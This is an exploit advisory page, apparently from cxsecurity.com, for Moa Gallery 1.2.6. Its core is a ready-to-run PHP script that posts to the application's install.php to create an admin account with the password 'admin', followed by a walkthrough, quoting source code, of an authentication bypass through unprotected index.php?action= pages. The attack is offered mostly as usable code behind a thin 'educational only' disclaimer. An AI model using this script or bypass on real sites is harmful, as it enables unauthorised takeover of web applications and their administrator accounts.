Moa Gallery 1.2.6 Multiple Vulnerabilities

2013.05.18
Credit: Slotleet
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/php # Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities # Date : 5/17/2013 # Author: Slotleet # Slotleet () GMAIL com # https://fb.com/Slotleet # Vendor Homepage: http://www.moagallery.net/ # Version affected : 1.2.6 # Tested on: WIN 7 Xd4rk EDITION # Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P # # this was written for educational purpose only. use it at your own risk. # `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility # intended for authorized web application pentesting only! #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Moe Gallery 1.2.6 Multiple Vulnerabilities #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ [Add Admin] <? error_reporting(0); if ($argc < 3){ echo "+--------------------------------------+\n"; echo "+ Usage : $argv[0] localhost /moe/ +\n"; echo "+--------------------------------------+\n"; die(); } $site = $argv[1]; $dir = $argv[2]; $ch = curl_init("http://$site/$dir/install.php?stage=stage3a"); curl_setopt ($ch, CURLOPT_POST, true); curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); if ($result){ echo "+-------------------------------------===--+\n"; echo "+ Done ~ Username : Admin Password : Admin +\n"; echo "+--------------------------------===-------+\n"; } ?> ~ [Session Bypass] 1 // Redirect admin access for anyone not logged in 2 if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin'))) 3 { 4 $action = 'login'; 5 } 6 7 switch($action) 8 { 9 case "admin" : 10 { 11 include_once("sources/page_admin.php"); 12 break; 13 } 14 case "admin_ftp" : 15 { 16 include_once("sources/page_admin_ftp.php"); 17 break; 18 } look to line 2 theres a function called Userisloggedin to check if the admin logged in or not, but there's `ACTION` param that calls sources folder with switch and case :). let's see if there's a UserIsLoggedIn() in those files :). // Only proceed if a user is logged in if (!UserIsLoggedIn()) { Aahhh There is ;), i check those files, and we can bypass it by browsing (index.php?action=list here) page_gallery_add.php page_gallery_view.php page_image_view.php page_image_view_full.php page_main_view.php page_sitemap.php page_slideshow.php page_upgrade.php we can browse it via (index.php?action=gallery_add) without (Page_) :) ./EOF

References:

http://www.moagallery.net/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top